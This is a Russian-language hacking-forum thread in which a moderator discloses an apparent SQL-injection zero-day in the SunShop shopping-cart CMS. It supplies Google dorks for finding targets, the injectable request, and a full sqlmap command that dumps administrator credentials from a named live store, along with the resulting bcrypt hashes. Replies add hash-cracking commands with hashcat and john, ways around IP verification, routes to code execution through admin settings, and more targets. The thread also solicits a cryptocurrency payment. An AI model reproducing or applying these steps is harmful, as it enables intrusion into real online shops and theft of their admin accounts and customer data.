• XSS.stack #1 – первый литературный журнал от юзеров форума

[LVL 1] 1337 H4k GAME

FantasticExploits

(L3) cache
Модератор
Регистрация
15.10.2023
Сообщения
252
Реакции
291
Гарант сделки
2
* intro

Было приятно читать прошлый топик, очень жаль, что ни кто кому было интересно найти мои контакты не догадался расшифровать сообщение в подписи. Я принял для себя решение, пусть мы не собрали в прошлом топике ту сумму на которую я расчитывал , а с моей пропажей переводы вообще остановились, я все равно продолжу и постараюсь сделать публикацию подобных постов ежегодным. Сегодня я хочу рассказать об уязвимости которой удавалось оставатся в тайне 10 лет и оставалась такой по сей день.


* CMS


Достаточно популярная CMS - есть процессинги. Платный движек, минимум шопов без ордеров.

exploit-db.com - последний баг датирован 2008 годом. SunShop.



* search


Дорки для гугла : "SunShop Login" , Powered by SunShop "Shopping Cart Software"


* 0day


заходим на сайт выбираем товар, меняем параметр размера, смострим в отладку.


Получаем реальное значение поля option (вспоминаем что такое x8). Вообще по большому секрету скажу, что там вообще все поля option во всех скриптах уязвимы к SQLi, стоит лиш добавить им sleep(10);

Код:
/index.php?l=addtocart

option[7760]=45541*&option[9041]=53369&product[id]=2691&regid=zLpO&product[quantity]=1

[code/]


Отправляем в sql-map

[code]

sqlmap -u "index.php?l=addtocart" --data="option[7760]=45541*&option[9041]=53369&product[id]=2691&regid=zLpO&product[quantity]=1" --technique=B --dbms=MySQL --batch  --answers=attack?=n,continue?=y --risk=3 --level=2 --time-sec=15 --timeout=100 --text-only --threads=10 -D alexande_alexanderelitefashions -T ss_admins -C username,password --dump --random-agent --threads=10 --sql-shell


Получаем зашифрованные аккаунты администраторов


Код:
| alexanderfashions | $2y$10$0red092Yqc./Ln9O4AGmxe65ZU62EbH6ZT1qkiYT2n7fqtW0Uv8Pq |

| twtadmin          | $2y$10$jQ00S0gSsFDILlF/1GB.vOE7y715szkB/RozOpT6v13Q.cORRFJEO |


/admin/ стандартный путь к админке.



в административной панли обращаем внимание на

Код:
admin/adminindex.php?action=settings&sub=general


* rce?


Код:
mail method - позволяет указать запускаемый скрипт (/usr/sbin/sendmail);

cURL connect - /usr/bin/curl


* Shop Phone Number: etc, позволяют вставить js.

* admin/adminindex.php?action=settings&sub=templates - редактор темплэйтов посзволяет вставить ваш код

Редактор бд смахивает на опенкарт, /admin/adminindex.php?action=settings&sub=backup : )




В этот раз копим 10000$ LTC: ltc1qrm8wlwl7nm04n75ry8f65p9q262g27sulx225z Первый контакт, ПМ. Неделю точно буду на этом аккаунте.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Последнее редактирование:
Скрытое содержимое
https://www.alexanderelitefashions.com/ -> выбираем_любой_товар -> https://www.alexanderelitefashions.com/index.php?l=product_detail&p=1840 -> меняем_размер_например -> получаем опнш, -> добавляем в корзину опять опшн. Там они кругом.
Для простоты ты можешь добавить к запросу SQLMAP - параметр form и он проверит все формы.
Screenshot from 2024-02-02 03-19-30.png
 

Error!​

The IP address you are attempting to login from cannot be verified. Please check your email to approve the login.
Сайты, которые просят айпи скипать?
| twtadmin | $2y$10$jQ00S0gSsFDILlF/1GB.vOE7y715szkB/RozOpT6v13Q.cORRFJEO | admin
Эта учетная запись есть везде, и везде нужно угадать IP. Попробуй спарсить IP из базы и поискать proxy/vpn из под той-же подсети. Что касается bcrypt. Это не небрутабельный алгоритм, а алгоритм который не сбрутишь на домашнем компьютере так быстро как тебе хотелось бы. Гугли по запросу - аренда GPU ну и как минимум стоит пробовать https://cmd5.com/
 
Подкину еще пару целей для практики:


 
меняй размер, и захватывай через бурп пост запрос
web server operating system: Linux CentOS

web application technology: PHP 7.4.33, Apache 2.4.58

back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
 
Последнее редактирование:
DB rebelr_SS4, все таки проблема с хэш. не понимаю как ты дальше работаешь. Т.е у нас есть хэш что дальше, что вообще дальше с этим всем делать? Обьясни, мне интересно, можешь в лс. Очень заинтересовало
 
Последнее редактирование:
DB rebelr_SS4, все таки проблема с хэш. не понимаю как ты дальше работаешь. Т.е у нас есть хэш что дальше, что вообще дальше с этим всем делать? Обьясни, мне интересно, можешь в лс. Очень заинтересовало
Хэши необходимо расшифровывать. В сообщение от @vagabond пояснение по алгоритму.
hashcat -a 0 -m 3200 hashes.txt ./rockyou.txt
john --format=bcrypt --wordlist=rockyou.txt hashes.txt
 
Здравствуйте, спасибо за статью.
Получаем реальное значение поля option (вспоминаем что такое x8).
А можно тут подробнее раскрыть? Что нужно со-значением сделать?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх